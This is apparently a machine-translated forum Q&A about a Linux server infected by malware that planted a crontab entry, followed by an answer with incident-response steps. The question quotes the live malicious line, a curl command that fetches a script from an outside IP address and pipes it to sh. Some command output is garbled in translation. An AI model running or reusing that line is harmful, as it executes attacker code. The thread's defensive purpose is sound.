以下のcrontabエントリを生成するマルウェアを抑制するために、IIはcron.denyの使用を導入します。
*/5 * * * * curl -fsSL http://62.109.20.220:38438/start.sh|sh
しかし、すべてのユーザーcrontabが突然すべてのジョブトリガーを停止しました。トラブルシューティング中に、すべてのユーザーがすべてのcron関連ファイルを編集できないことを確認しました。
ls -lht /etc/cron.denyus -rw----er--- 1 root root 5 May 23 11:51 /etc/cron.deny
ls -lht /var/spool/cron/root
-rw-r--r-- 1 root root 62 Jun 16 08:10 /var/spool/cron/root
chmod 775 /etc/cron.deny
chmod: changing permissions of `/etc/cron.deny': Operation not permitted
chmod 775 /var/spool/cron/root
chmod: changing permissions of `/var/spool/cron/root': Operation not permitted
その後、私はそれらがすべて不変の属性を持っていることを発見しました。
lsattr /var/spool/cron/root
----i--------e- /var/spool/cron/root
lsattr /etc/cron.deny
----i--------e- /etc/cron.deny
以下を使用して不変属性を変更しました。
chattr -i /etc/cron.deny
chattr -i /var/spool/cron/root
ただし、cronはこれらのタスクを実行できません。
答え1
そこに停止!あなたのシステムがマルウェアに感染しています。この時点では、システムが話すことを信頼できません。マルウェアがカーネルを修正した可能性があります。あなたが見るのは、マルウェアがあなたに見せたいと思うことです。システムが一貫して動作しない場合があります。たとえば、編集者がファイルを正常に保存したとしても、ファイルを変更することを期待しないでください。
もう一度権限、不変属性などを理解することを忘れてください。これらはすべて作業システムにのみ適用されます。破損したシステムでは、仕事は一貫した方法で実行されません。
今やるべきことは次のとおりです。
- 今サーバーをオフラインにする。ユーザーをマルウェアに感染させる可能性があります。
- バックアップする。既存のバックアップを削除しないでください。 2つの理由で感染したシステムをバックアップする必要があります。感染源を追跡し、最新のデータを取得するためです。
- どのように感染したかを調べる。これは重要です。以前と同じセキュリティ侵害からシステムを回復すると、システムは再び感染します。
- 最初から新しいシステムをインストール。システムからマルウェアを確実に削除することはできません。マルウェアはそれを難しくしようとするので、それをだますことができるかどうかはわかりません。
すべてのソフトウェアに最新のセキュリティ更新プログラムをインストールし、再感染を防ぐために安全に設定されていることを確認してください。 - データを回復する。復元のみを確認してください。データ、いいえ脆弱なソフトウェア。
また、見ることができます感染したサーバーを処理する方法は?